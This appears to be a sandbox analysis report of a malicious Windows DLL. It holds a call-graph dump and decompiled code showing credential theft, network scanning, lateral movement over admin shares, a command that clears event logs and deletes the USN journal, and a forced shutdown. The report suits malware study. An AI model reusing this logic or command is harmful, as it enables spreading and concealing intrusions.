11e1000 GetProcessHeap RtlAllocateHeap 7213->7234 7215 11e51d9 7216 11e20d0 2 API calls 7215->7216 7219 11e5106 7216->7219 7217 11e4c1c 17 API calls 7218 11e50fd 7217->7218 7218->7215 7218->7217 7218->7219 7220 11e51e6 7218->7220 7222 11e5189 memcpy 7218->7222 7224 11e51c8 7218->7224 7219->6669 7219->6670 7221 11e20d0 2 API calls 7220->7221 7221->7215 7223 11e20d0 2 API calls 7222->7223 7223->7218 7225 11e20d0 2 API calls 7224->7225 7225->7219 7226->7161 7227->7171 7228->7187 7229->7169 7230->7182 7231->7189 7232->7186 7233->7208 7234->7218 7235->6676 7236->6685 7237->6702 7238->6684 7239->6700 7240->6701 7241->6704 7242->6723 7243->6733 7244->6745 7245->6747 7246->6755 7248 11e24dd 7247->7248 7251 11e24d9 7247->7251 7254 11e1000 GetProcessHeap RtlAllocateHeap 7248->7254 7250 11e24ee 7250->7251 7252 11e24f4 memcpy 7250->7252 7251->6758 7251->6759 7252->7251 7253->6767 7254->7250 7256 11e680e 7255->7256 7257 11e245d 7255->7257 7256->7257 7258 11e6812 recv 7256->7258 7257->6454 7258->7257 7259 11e682b htons 7258->7259 7259->7257 7260 11e6853 7259->7260 7260->7257 7261 11e6855 recv 7260->7261 7261->7257 7262 11e6878 7261->7262 7262->7261 7263 11e6885 7262->7263 7263->7257 7264->6788 7266 11e3488 7265->7266 7267 11e3483 7265->7267 7303 11e1000 GetProcessHeap RtlAllocateHeap 7266->7303 7270 11e2466 3 API calls 7267->7270 7285 11e34e1 7267->7285 7269 11e3496 7269->7267 7271 11e349c memcpy 7269->7271 7272 11e3510 7270->7272 7271->7267 7293 11e3519 7272->7293 7304 11e1000 GetProcessHeap RtlAllocateHeap 7272->7304 7273 11e35e8 7277 11e688f 3 API calls 7273->7277 7274 11e3585 7305 11e1000 GetProcessHeap RtlAllocateHeap 7274->7305 7302 11e35cc 7277->7302 7278 11e358b 7283 11e359e 7278->7283 7284 11e3594 7278->7284 7279 11e352c 7281 11e3540 memcpy 7279->7281 7282 11e3533 7279->7282 7280 11e20d0 2 API calls 7280->7285 7290 11e20d0 2 API calls 7281->7290 7288 11e20d0 2 API calls 7282->7288 7289 11e688f 3 API calls 7283->7289 7286 11e20d0 2 API calls 7284->7286 7285->7273 7285->7274 7291 11e3575 7285->7291 7286->7291 7287 11e20d0 2 API calls 7287->7291 7288->7293 7295 11e35b0 7289->7295 7292 11e3563 7290->7292 7291->6790 7294 11e20d0 2 API calls 7292->7294 7293->7280 7294->7285 7296 11e35c4 7295->7296 7298 11e243f 5 API calls 7295->7298 7297 11e20d0 2 API calls 7296->7297 7297->7302 7299 11e35c0 7298->7299 7299->7296 7300 11e35db 7299->7300 7301 11e20d0 2 API calls 7300->7301 7301->7302 7302->7287 7303->7269 7304->7279 7305->7278 7333 11e1000 GetProcessHeap RtlAllocateHeap 7306->7333 7308 11e271b 7309 11e2728 memcpy 7308->7309 7319 11e27b4 7308->7319 7310 11e273d 7309->7310 7310->7310 7334 11e1000 GetProcessHeap RtlAllocateHeap 7310->7334 7312 11e274c 7313 11e2757 memcpy 7312->7313 7315 11e2752 7312->7315 7313->7315 7314 11e27ac 7317 11e20d0 2 API calls 7314->7317 7315->7314 7316 11e2466 3 API calls 7315->7316 7318 11e279b 7316->7318 7317->7319 7320 11e27bd 7318->7320 7321 11e27a4 7318->7321 7319->6812 7332 11e1000 GetProcessHeap RtlAllocateHeap 7319->7332 7335 11e1000 GetProcessHeap RtlAllocateHeap 7320->7335 7323 11e20d0 2 API calls 7321->7323 7323->7314 7324 11e27c6 7325 11e27cc 7324->7325 7326 11e27e8 memcpy 7324->7326 7327 11e20d0 2 API calls 7325->7327 7326->7325 7328 11e27d4 7327->7328 7329 11e20d0 2 API calls 7328->7329 7330 11e27dc 7329->7330 7331 11e20d0 2 API calls 7330->7331 7331->7319 7332->6807 7333->7308 7334->7312 7335->7324 7357 11e1000 GetProcessHeap RtlAllocateHeap 7336->7357 7338 11e262d 7345 11e26c1 7338->7345 7358 11e1000 GetProcessHeap RtlAllocateHeap 7338->7358 7340 11e2659 7341 11e26b9 7340->7341 7342 11e2466 3 API calls 7340->7342 7343 11e20d0 2 API calls 7341->7343 7344 11e26a8 7342->7344 7343->7345 7346 11e26ca 7344->7346 7347 11e26b1 7344->7347 7345->6822 7356 11e1000 GetProcessHeap RtlAllocateHeap 7345->7356 7359 11e1000 GetProcessHeap RtlAllocateHeap 7346->7359 7349 11e20d0 2 API calls 7347->7349 7349->7341 7350 11e26d3 7351 11e20d0 2 API calls 7350->7351 7352 11e26e1 7351->7352 7353 11e20d0 2 API calls 7352->7353 7354 11e26e9 7353->7354 7355 11e20d0 2 API calls 7354->7355 7355->7345 7356->6824 7357->7338 7358->7340 7359->7350 7360->6837 7361->6855 7362->6865 7363->6861 7364->6896 7365->6902 7367 11ea125 GetProcessHeap HeapAlloc 7366->7367 7368 11ea11e 7366->7368 7369 11ea153 GetProcessHeap HeapAlloc 7367->7369 7370 11ea26b 7367->7370 7371 11e9f8e 127 API calls 7368->7371 7369->7370 7372 11ea16c 7369->7372 7371->7367 7431 11e6f40 7372->7431 7374 11ea1a1 CreateThread 7375 11ea263 7374->7375 7378 11ea175 7374->7378 7438 11ea073 7374->7438 7437 11e6f78 GetProcessHeap HeapFree 7375->7437 7377 11ea1d9 WaitForMultipleObjects 7377->7375 7377->7378 7378->7370 7378->7374 7378->7375 7378->7377 7379 11ea22b GetProcessHeap HeapAlloc 7378->7379 7380 11ea219 CloseHandle 7378->7380 7434 11e6f02 7378->7434 7379->7375 7381 11ea23a GetProcessHeap HeapAlloc 7379->7381 7380->7379 7381->7375 7381->7378 7384 11e6fc7 13 API calls 7383->7384 7385 11e7c30 7384->7385 7386 11e6fc7 13 API calls 7385->7386 7387 11e7c3b GetComputerNameExW 7386->7387 7388 11e7c65 CreateThread 7387->7388 7389 11e7c59 7387->7389 7392 11e7c79 7388->7392 7592 11e8e7f 7388->7592 7390 11e6fc7 13 API calls 7389->7390 7390->7388 7394 11e7c98 Sleep 7392->7394 7567 11e777b LoadLibraryW 7392->7567 7576 11e786b GetIpNetTable 7392->7576 7585 11e795a NetServerEnum 7392->7585 7394->7392 7397 11e6f40 7 API calls 7396->7397 7398 11ea299 7397->7398 7399 11ea2cf GetProcessHeap HeapFree 7398->7399 7401 11e6f02 3 API calls 7398->7401 7402 11e6f91 4 API calls 7398->7402 7403 11ea2c9 7398->7403 7659 11e9dc3 7398->7659 7401->7398 7402->7398 7665 11e6f78 GetProcessHeap HeapFree 7403->7665 7406 11e9fb8 DuplicateTokenEx 7405->7406 7407 11e9fcf 7405->7407 7406->7407 7408 11e7091 13 API calls 7407->7408 7409 11e9fe9 7408->7409 7666 11e7a17 WNetOpenEnumW 7409->7666 7414 11e70fa 3 API calls 7415 11e9ffd 7414->7415 7416 11e6f40 7 API calls 7415->7416 7425 11ea008 7416->7425 7417 11ea04d 7419 11ea060 7417->7419 7420 11ea058 CloseHandle 7417->7420 7418 11e9987 75 API calls 7418->7425 7421 11ea065 CloseHandle 7419->7421 7422 11ea06a 7419->7422 7420->7419 7421->7422 7423 11e6f91 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 7423->7425 7424 11e6f02 3 API calls 7424->7425 7425->7417 7425->7418 7425->7423 7425->7424 7426 11ea047 7425->7426 7684 11e6f78 GetProcessHeap HeapFree 7426->7684 7685 11e8bc6 GetCurrentThread OpenThreadToken 7428->7685 7432 11e711f 7 API calls 7431->7432 7433 11e6f56 7432->7433 7433->7378 7435 11e7167 3 API calls 7434->7435 7436 11e6f13 7435->7436 7436->7378 7437->7370 7439 11ea0f7 7438->7439 7440 11ea07f 7438->7440 7441 11ea0a6 7440->7441 7494 11e9e05 7440->7494 7443 11ea0ae 7441->7443 7446 11ea0b9 7441->7446 7450 11ea0c9 7441->7450 7501 11e9ec7 7443->7501 7445 11ea0d9 GetProcessHeap HeapFree GetProcessHeap HeapFree 7445->7439 7446->7445 7451 11e9987 7446->7451 7450->7445 7514 11e6f91 7450->7514 7452 11e9997 7451->7452 7453 11e9d97 SetLastError 7452->7453 7454 11e99b1 wsprintfW 7452->7454 7453->7450 7518 11e8b70 7454->7518 7458 11e9a2f WNetAddConnection2W wsprintfW PathFindExtensionW 7459 11e9a81 PathFileExistsW 7458->7459 7460 11e9aa2 7458->7460 7462 11e9a98 GetLastError 7459->7462 7463 11e9b17 7459->7463 7460->7453 7461 11e8946 3 API calls 7460->7461 7460->7463 7465 11e9ac3 GetLastError 7460->7465 7467 11e9b24 7460->7467 7474 11e9b00 WNetCancelConnection2W 7460->7474 7461->7460 7462->7460 7463->7453 7464 11e9d83 WNetCancelConnection2W 7463->7464 7464->7453 7465->7460 7465->7463 7466 11e9b43 GetCurrentThread OpenThreadToken 7469 11e9b65 DuplicateTokenEx 7466->7469 7492 11e9b7e 7466->7492 7467->7466 7468 11e9b2e 7467->7468 7521 11e6ce7 7468->7521 7469->7492 7472 11e9d58 7475 11e9d6c 7472->7475 7476 11e9d5e CloseHandle 7472->7476 7473 11e9b8c memset 7480 11e9bd5 7473->7480 7473->7492 7474->7458 7475->7463 7478 11e9d72 CloseHandle 7475->7478 7476->7475 7478->7463 7479 11e9d2b GetLastError 7479->7492 7481 11e9d4a DeleteFileW 7480->7481 7480->7492 7534 11e97a5 7480->7534 7545 11e98ab 7480->7545 7481->7472 7482 11e9c78 CreateProcessW 7482->7492 7483 11e9c6c CreateProcessAsUserW 7483->7492 7484 11e9d44 7484->7472 7484->7481 7486 11e9c86 WaitForSingleObject GetExitCodeProcess 7487 11e9cb1 CloseHandle 7486->7487 7486->7492 7487->7492 7488 11e9cbd CloseHandle 7488->7492 7489 11e9cc9 CloseHandle 7489->7492 7490 11e9cd5 CloseHandle 7490->7492 7491 11e9ce1 CloseHandle 7491->7492 7492->7472 7492->7473 7492->7479 7492->7480 7492->7481 7492->7482 7492->7483 7492->7484 7492->7486 7492->7488 7492->7489 7492->7490 7492->7491 7493 11e9d17 PathFileExistsW 7492->7493 7493->7492 7495 11e711f 7 API calls 7494->7495 7496 11e9e29 7495->7496 7497 11e9e97 7496->7497 7498 11e9987 75 API calls 7496->7498 7499 11e9e88 GetProcessHeap HeapFree 7496->7499 7500 11e7167 3 API calls 7496->7500 7497->7441 7498->7496 7499->7497 7500->7496 7502 11e711f 7 API calls 7501->7502 7503 11e9ee4 7502->7503 7504 11e9f85 7503->7504 7505 11e9ef3 CreateThread 7503->7505 7509 11e9f7d 7503->7509 7512 11e7167 3 API calls 7503->7512 7504->7446 7504->7450 7505->7503 7506 11e9f26 SetThreadToken 7505->7506 7564 11e9ea4 7505->7564 7507 11e9f56 CloseHandle 7506->7507 7508 11e9f35 ResumeThread 7506->7508 7507->7503 7510 11e9f43 WaitForSingleObject 7508->7510 7511 11e9f50 GetLastError 7508->7511 7563 11e6f78 GetProcessHeap HeapFree 7509->7563 7510->7507 7511->7507 7512->7503 7515 11e6fa3 7514->7515 7515->7515 7516 11e724d 4 API calls 7515->7516 7517 11e6fc2 7516->7517 7517->7445 7519 11e8b7b PathFindFileNameW 7518->7519 7520 11e8b8a wsprintfW 7518->7520 7519->7520 7520->7458 7522 11e6cff 7521->7522 7522->7522 7523 11e6d0a GetProcessHeap HeapAlloc 7522->7523 7524 11e6dd7 7523->7524 7525 11e6d33 7523->7525 7524->7466 7525->7525 7526 11e6d44 memcpy 7525->7526 7527 11e6d61 7526->7527 7527->7527 7528 11e6d6c GetProcessHeap HeapAlloc 7527->7528 7529 11e6dcc GetProcessHeap HeapFree 7528->7529 7530 11e6d8a 7528->7530 7529->7524 7530->7530 7531 11e6d9b memcpy 7530->7531 7556 11e724d 7531->7556 7535 11e97b2 7534->7535 7536 11e8b70 PathFindFileNameW 7535->7536 7542 11e97cf 7536->7542 7537 11e981e SetLastError 7538 11e982b PathFileExistsW 7537->7538 7539 11e989a 7537->7539 7538->7539 7540 11e9836 wsprintfW wsprintfW 7538->7540 7539->7480 7541 11e6bb0 16 API calls 7540->7541 7544 11e986d memcpy 7541->7544 7542->7537 7542->7542 7544->7539 7546 11e98b8 7545->7546 7547 11e8b70 PathFindFileNameW 7546->7547 7548 11e98d2 GetSystemDirectoryW 7547->7548 7549 11e9971 GetLastError 7548->7549 7550 11e98e6 PathAppendW PathFileExistsW 7548->7550 7553 11e9977 7549->7553 7551 11e98fd wsprintfW wsprintfW 7550->7551 7550->7553 7552 11e6bb0 16 API calls 7551->7552 7554 11e993a wsprintfW 7552->7554 7553->7480 7554->7553 7557 11e725b EnterCriticalSection 7556->7557 7558 11e6dc0 GetProcessHeap HeapFree 7556->7558 7559 11e726b 7557->7559 7558->7529 7560 11e71d6 2 API calls 7559->7560 7561 11e7279 LeaveCriticalSection 7560->7561 7561->7558 7563->7504 7565 11e9987 75 API calls 7564->7565 7566 11e9ebe 7565->7566 7568 11e779a GetProcAddress 7567->7568 7569 11e7864 7567->7569 7570 11e77b2 GetProcessHeap RtlAllocateHeap 7568->7570 7571 11e7853 GetLastError 7568->7571 7569->7392 7572 11e7859 FreeLibrary 7570->7572 7574 11e77d7 7570->7574 7571->7572 7572->7569 7573 11e7841 GetProcessHeap HeapFree 7573->7572 7574->7573 7575 11e6fc7 13 API calls 7574->7575 7575->7574 7577 11e7897 7576->7577 7579 11e7890 7576->7579 7578 11e78a0 GetProcessHeap HeapAlloc 7577->7578 7577->7579 7578->7579 7580 11e78bf GetIpNetTable 7578->7580 7579->7392 7581 11e7941 GetProcessHeap HeapFree 7580->7581 7583 11e78cb 7580->7583 7581->7579 7582 11e793d 7582->7581 7583->7581 7583->7582 7584 11e6fc7 13 API calls 7583->7584 7584->7583 7587 11e7995 7585->7587 7586 11e7a0e 7586->7392 7587->7586 7588 11e799c 7587->7588 7590 11e795a 13 API calls 7587->7590 7591 11e6fc7 13 API calls 7587->7591 7588->7586 7589 11e7a05 NetApiBufferFree 7588->7589 7589->7586 7590->7587 7591->7587 7593 11ea4f0 7592->7593 7594 11e8e8f memset memset GetAdaptersInfo 7593->7594 7595 11e907f 7594->7595 7596 11e8eeb LocalAlloc 7594->7596 7596->7595 7597 11e8f05 GetAdaptersInfo 7596->7597 7598 11e9075 LocalFree 7597->7598 7604 11e8f15 7597->7604 7598->7595 7599 11e8f23 inet_addr inet_addr 7617 11e6916 MultiByteToWideChar 7599->7617 7600 11e8fc8 7621 11e8243 NetServerGetInfo 7600->7621 7604->7599 7604->7600 7607 11e6fc7 13 API calls 7604->7607 7608 11e6916 4 API calls 7604->7608 7613 11e6fc7 13 API calls 7604->7613 7606 11e905e 7606->7598 7610 11e9064 CloseHandle 7606->7610 7609 11e8f70 GetProcessHeap HeapFree 7607->7609 7608->7604 7609->7604 7610->7598 7610->7610 7611 11e8fe5 LocalAlloc 7612 11e8ff5 inet_addr 7611->7612 7615 11e8fd9 7611->7615 7612->7615 7616 11e8fa8 GetProcessHeap HeapFree 7613->7616 7614 11e9020 htonl htonl CreateThread 7614->7615 7650 11e8e04 7614->7650 7615->7606 7615->7611 7615->7614 7616->7604 7618 11e693e GetProcessHeap HeapAlloc 7617->7618 7619 11e696a 7617->7619 7618->7619 7620 11e6956 MultiByteToWideChar 7618->7620 7619->7604 7620->7619 7622 11e8261 7621->7622 7623 11e8276 NetApiBufferFree 7622->7623 7624 11e827d 7622->7624 7623->7624 7624->7615 7625 11e908a GetComputerNameExW DhcpEnumSubnets 7624->7625 7626 11e91f1 7625->7626 7635 11e9101 7625->7635 7626->7615 7627 11e91e8 DhcpRpcFreeMemory 7627->7626 7628 11e9111 DhcpGetSubnetInfo 7628->7635 7629 11e9139 DhcpEnumSubnetClients 7629->7635 7630 11e91cf DhcpRpcFreeMemory 7630->7635 7631 11e917f htonl 7638 11ea3d9 7631->7638 7633 11e9193 htonl inet_ntoa 7634 11e6916 4 API calls 7633->7634 7634->7635 7635->7627 7635->7628 7635->7629 7635->7630 7635->7631 7635->7633 7636 11e6fc7 13 API calls 7635->7636 7637 11e91b4 GetProcessHeap HeapFree 7636->7637 7637->7635 7643 11ea2e8 memset socket 7638->7643 7641 11ea2e8 8 API calls 7642 11ea3fd 7641->7642 7642->7635 7644 11ea345 htons ioctlsocket 7643->7644 7645 11ea3cf 7643->7645 7646 11ea374 connect select 7644->7646 7647 11ea3c8 closesocket 7644->7647 7645->7641 7645->7642 7646->7647 7648 11ea3b3 __WSAFDIsSet 7646->7648 7647->7645 7648->7647 7649 11ea3c5 7648->7649 7649->7647 7651 11e8e6f LocalFree 7650->7651 7655 11e8e1e 7650->7655 7652 11e8e24 htonl 7653 11ea3d9 8 API calls 7652->7653 7653->7655 7654 11e8e31 htonl inet_ntoa 7656 11e6916 4 API calls 7654->7656 7655->7651 7655->7652 7655->7654 7657 11e6fc7 13 API calls 7655->7657 7656->7655 7658 11e8e51 GetProcessHeap HeapFree 7657->7658 7658->7655 7660 11e9dd0 7659->7660 7661 11e6bb0 16 API calls 7660->7661 7662 11e9de8 7661->7662 7663 11e96c7 95 API calls 7662->7663 7664 11e9dfc 7662->7664 7663->7664 7664->7398 7665->7399 7667 11e7a4a GlobalAlloc 7666->7667 7668 11e7b28 7666->7668 7669 11e7b27 7667->7669 7675 11e7a63 7667->7675 7676 11e7b31 CredEnumerateW 7668->7676 7669->7668 7670 11e7a66 memset WNetEnumResourceW 7671 11e7b0d GlobalFree WNetCloseEnum 7670->7671 7670->7675 7671->7669 7673 11e7a17 13 API calls 7673->7675 7674 11e6fc7 13 API calls 7674->7675 7675->7670 7675->7673 7675->7674 7677 11e7c08 7676->7677 7681 11e7b5b 7676->7681 7677->7414 7678 11e7bff CredFree 7678->7677 7679 11e6fc7 13 API calls 7679->7681 7680 11e7bfd 7680->7678 7681->7678 7681->7679 7681->7680 7682 11e7bbd 7681->7682 7682->7681 7683 11e6de0 23 API calls 7682->7683 7683->7682 7684->7417 7686 11e8cb3 GetLastError 7685->7686 7687 11e8bf5 GetTokenInformation 7685->7687 7688 11e7d60 7686->7688 7689 11e8ca8 CloseHandle 7687->7689 7690 11e8c13 GetLastError 7687->7690 7689->7688 7691 11e8ca6 7690->7691 7692 11e8c25 GlobalAlloc 7690->7692 7691->7689 7693 11e8ca4 GetLastError 7692->7693 7694 11e8c37 GetTokenInformation 7692->7694 7693->7691 7695 11e8c99 GetLastError 7694->7695 7700 11e8c4a 7694->7700 7696 11e8c9b GlobalFree 7695->7696 7696->7691 7697 11e8c59 GetSidSubAuthorityCount 7697->7700 7698 11e8c6a GetSidSubAuthority 7698->7700 7699 11e8c97 7699->7696 7700->7696 7700->7697 7700->7698 7700->7699 7717 11eadcb 7719 11eaddf 7717->7719 7718 11eaea2 7720 11ebc5b 3 API calls 7718->7720 7722 11eac62 7718->7722 7719->7718 7721 11eae74 memcpy 7719->7721 7720->7722 7721->7718 7723 11ec236 free 7744 11e6caa 7745 11e6cb5 7744->7745 7749 11e6ce0 7744->7749 7746 11e6cc9 GetProcessHeap HeapFree 7745->7746 7747 11e6cd1 7745->7747 7746->7747 7748 11e6cd8 GetProcessHeap HeapFree 7747->7748 7747->7749 7748->7749 7750 11e1019 7751 11e1034 7750->7751 7752 11e1022 GetProcessHeap HeapFree 7750->7752 7752->7751 7724 11e7d39 7725 11e7d51 7724->7725 7726 11e7d42 DisableThreadLibraryCalls 7724->7726 7726->7725 7765 11eb765 7766 11eb76f 7765->7766 7767 11ebc5b 3 API calls 7766->7767 7768 11eac62 7766->7768 7767->7768

    Executed Functions

    Function 011E7DEB, Relevance: 66.8, APIs: 33, Strings: 5, Instructions: 295
    C-Code - Quality: 80%
    			E011E7DEB(signed int _a4, long _a8, void _a12, void* _a16) {
				void* _v8;
				struct _OSVERSIONINFOW _v284;
				char _v540;
				short _v542;
				short _v2588;
				char _v18972;
				void* _t91;
				struct HINSTANCE__* _t104;
				intOrPtr _t110;
				void* _t116;
				signed int _t121;
				void* _t123;
				void* _t126;
				signed int _t139;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr* _t159;
				void* _t160;

				E011EA4F0(0x4a18);
				E011E7CC0();
				if(_a16 != 0xffffffff) {
					E011E9590(_t149, _a4, _a8, _a12);
				}
				__imp__#115(0x202, 0x11ff768); // executed
				 *0x11ff140 = E011E7091(0x24, E011E6EDA, 0, 0xffff);
				 *0x11ff108 = E011E7091(8, E011E6C74, E011E6CAA, 0xff);
				 *0x11ff110 = 0;
				InitializeCriticalSection(0x11ff124);
				E011E6A2B(_t149, _a12);
				_t162 =  *0x11ff144 & 0x00000002;
				if(( *0x11ff144 & 0x00000002) != 0) {
					E011E835E(_t162); // executed
					E011E8D5A(_t149); // executed
				}
				E011E84DF();
				CreateThread(0, 0, E011E7C10, 0, 0, 0); // executed
				if(( *0x11ff144 & 0x00000002) != 0 && ( *0x11ff104 & 0x00000001) != 0) {
					E011E7545();
				}
				_t155 =  *0x11ff108; // 0x2e6710
				E011E70FA(_t155);
				if(( *0x11ff104 & 0x00000002) != 0) {
					_t139 =  *0x11ff144; // 0x3
					E011E8999(_t149, _t139 & 0x00000006); // executed
				}
				_t167 =  *0x11ff144 & 0x00000004;
				if(( *0x11ff144 & 0x00000004) == 0) {
					L28:
					_t156 =  *0x11ff110; // 0x0
					E011E70FA(_t156);
					CreateThread(0, 0, E011EA0FE, 0, 0, 0); // executed
					_a16 = 0;
					_a4 = 0;
					_a12 = 0;
					_a8 = 0;
					E011E8282(_t149,  &_a16,  &_a4,  &_a12,  &_a8);
					_t91 = HeapAlloc(GetProcessHeap(), 8, 4);
					_v8 = _t91;
					if(_t91 != 0) {
						_t149 = _a12 * 0xea60;
						 *_t91 = _a12 * 0xea60; // executed
						_t116 = CreateThread(0, 0, E011EA274, _t91, 0, 0); // executed
						if(_t116 == 0) {
							HeapFree(GetProcessHeap(), 0, _v8);
						}
					}
					Sleep(_a16 * 0xea60);
					if(( *0x11ff104 & 0x00000010) != 0) {
						E011E1EEF(_t149); // executed
					}
					Sleep(_a8 * 0xea60); // executed
					if(( *0x11ff144 & 0x00000002) != 0) {
						L43:
						Sleep(_a4 * 0xea60); // executed
						wsprintfW( &_v2588, L"wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:",  *0x11ff148 & 0x0000ffff);
						_t160 = _t160 + 0xc;
						_v542 = 0;
						E011E83BD( &_v2588, 3); // executed
						if(( *0x11ff144 & 0x00000001) != 0) {
							_t104 = GetModuleHandleA("ntdll.dll");
							if(_t104 != 0) {
								_t104 = GetProcAddress(_t104, "NtRaiseHardError");
								if(_t104 != 0) {
									_t104 = _t104->i(0xc0000350, 0, 0, 0, 6,  &_a12); // executed
								}
							}
							__imp__InitiateSystemShutdownExW(0, 0, 0, 1, 1, 0x80000000);
							if(_t104 == 0) {
								ExitWindowsEx(6, 0);
							}
						}
						goto L42;
					} else {
						memset( &_v284, 0, 0x114);
						_t160 = _t160 + 0xc;
						_v284.dwOSVersionInfoSize = 0x114;
						if(GetVersionExW( &_v284) == 0) {
							goto L43;
						}
						_t110 = _v284.dwMinorVersion;
						if(_v284.dwMajorVersion != 5 || _t110 != 1 && _t110 != 2) {
							if(_v284.dwMajorVersion != 6 || _t110 != 0 && _t110 != 1) {
								goto L43;
							} else {
								goto L41;
							}
						} else {
							L41:
							E011E6BB0( &_v18972);
							if(E011E7D6F( &_v18972) == 0) {
								goto L43;
							}
							L42:
							ExitProcess(0);
						}
					}
				}
				 *0x11ff110 = E011E7091(4, E011E7CA5, 0, 0xff);
				_push( &_v540);
				_t121 = E011E875A(_t167);
				if(_t121 != 0) {
					_t159 =  &_v540;
					_a4 = _t121;
					do {
						_v8 =  *_t159;
						_a12 = 0;
						_a8 = 0;
						_t123 = CreateThread(0, 0, E011E9F8E, 0, 4, 0);
						_a12 = _t123;
						if(_t123 == 0) {
							_a8 = 0x57;
							goto L19;
						}
						if(SetThreadToken( &_a12, _v8) == 0) {
							_a8 = GetLastError();
							L17:
							CloseHandle(_a12);
							goto L19;
						}
						if(ResumeThread(_a12) != 0xffffffff) {
							goto L19;
						}
						goto L17;
						L19:
						SetLastError(_a8);
						_a8 =  *_t159;
						_a12 = 0;
						_t126 = CreateThread(0, 0, E011E7D58,  &_a12, 4, 0);
						_a16 = _t126;
						if(_t126 != 0) {
							if(SetThreadToken( &_a16, _a8) != 0) {
								if(ResumeThread(_a16) == 0xffffffff) {
									GetLastError();
								} else {
									WaitForSingleObject(_a16, 0xffffffff);
								}
							}
							CloseHandle(_a16);
						}
						if(_a12 != 0) {
							E011E7298(_t149,  *0x11ff110, _t159, 0);
						}
						_t159 = _t159 + 4;
						_t40 =  &_a4;
						 *_t40 = _a4 - 1;
					} while ( *_t40 != 0);
				}
			}





















    0x011e7df3
    0x011e7dfb
    0x011e7e04
    0x011e7e0f
    0x011e7e0f
    0x011e7e1e
    0x011e7e49
    0x011e7e58
    0x011e7e5d
    0x011e7e63
    0x011e7e6c
    0x011e7e71
    0x011e7e78
    0x011e7e7a
    0x011e7e7f
    0x011e7e7f
    0x011e7e84
    0x011e7e99
    0x011e7ea2
    0x011e7ead
    0x011e7ead
    0x011e7eb2
    0x011e7eb8
    0x011e7ec4
    0x011e7ec6
    0x011e7ecf
    0x011e7ecf
    0x011e7ed4
    0x011e7edb
    0x011e7ff1
    0x011e7ff1
    0x011e7ff7
    0x011e8006
    0x011e8018
    0x011e801b
    0x011e801e
    0x011e8021
    0x011e8024
    0x011e8036
    0x011e803c
    0x011e8041
    0x011e8047
    0x011e8056
    0x011e8058
    0x011e805c
    0x011e8065
    0x011e8065
    0x011e805c
    0x011e807b
    0x011e8084
    0x011e8086
    0x011e8086
    0x011e8095
    0x011e809e
    0x011e811b
    0x011e8125
    0x011e813b
    0x011e8143
    0x011e8146
    0x011e8155
    0x011e8161
    0x011e8168
    0x011e8170
    0x011e8178
    0x011e8180
    0x011e8190
    0x011e8190
    0x011e8180
    0x011e819e
    0x011e81a6
    0x011e81af
    0x011e81af
    0x011e81a6
    0x00000000
    0x011e80a0
    0x011e80ae
    0x011e80b3
    0x011e80bd
    0x011e80cb
    0x00000000
    0x00000000
    0x011e80d4
    0x011e80da
    0x011e80ed
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e80f8
    0x011e80f8
    0x011e80ff
    0x011e8112
    0x00000000
    0x00000000
    0x011e8114
    0x011e8115
    0x011e8115
    0x011e80da
    0x011e809e
    0x011e7ef3
    0x011e7efe
    0x011e7eff
    0x011e7f06
    0x011e7f0c
    0x011e7f12
    0x011e7f15
    0x011e7f22
    0x011e7f25
    0x011e7f28
    0x011e7f2b
    0x011e7f2d
    0x011e7f32
    0x011e7f69
    0x00000000
    0x011e7f69
    0x011e7f43
    0x011e7f5b
    0x011e7f5e
    0x011e7f61
    0x00000000
    0x011e7f61
    0x011e7f51
    0x00000000
    0x00000000
    0x00000000
    0x011e7f70
    0x011e7f73
    0x011e7f7e
    0x011e7f8c
    0x011e7f8f
    0x011e7f91
    0x011e7f96
    0x011e7fa7
    0x011e7fb5
    0x011e7fc4
    0x011e7fb7
    0x011e7fbc
    0x011e7fbc
    0x011e7fb5
    0x011e7fcd
    0x011e7fcd
    0x011e7fd6
    0x011e7fe0
    0x011e7fe0
    0x011e7fe5
    0x011e7fe8
    0x011e7fe8
    0x011e7fe8
    0x011e7f15

    APIs
      • Part of subcall function 011E7CC0: GetTickCount.KERNEL32(?,011E7E00), ref: 011E7CCB
      • Part of subcall function 011E7CC0: GetModuleFileNameW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,0000030C,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,011E7E00), ref: 011E7D27
      • Part of subcall function 011E7CC0: CreateFileW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E8AEC
      • Part of subcall function 011E7CC0: GetFileSize.KERNEL32(00000000,00000000), ref: 011E8AFD
      • Part of subcall function 011E7CC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E8B0C
      • Part of subcall function 011E7CC0: HeapAlloc.KERNEL32(00000000), ref: 011E8B13
      • Part of subcall function 011E7CC0: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 011E8B2C
      • Part of subcall function 011E7CC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E8B3D
      • Part of subcall function 011E7CC0: HeapFree.KERNEL32(00000000), ref: 011E8B44
      • Part of subcall function 011E7CC0: CloseHandle.KERNEL32(?), ref: 011E8B63
    • WSAStartup.WS2_32(00000202,011FF768), ref: 011E7E1E
      • Part of subcall function 011E7091: GetProcessHeap.KERNEL32(00000008,00000034,00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70A1
      • Part of subcall function 011E7091: HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70AA
      • Part of subcall function 011E7091: InitializeCriticalSection.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70B3
      • Part of subcall function 011E7091: GetProcessHeap.KERNEL32(00000008,000000FF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70DE
      • Part of subcall function 011E7091: HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70E1
    • InitializeCriticalSection.KERNEL32(011FF124,00000008,011E6C74,011E6CAA,000000FF,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7E63
      • Part of subcall function 011E6A2B: CommandLineToArgvW.SHELL32(?,?), ref: 011E6A61
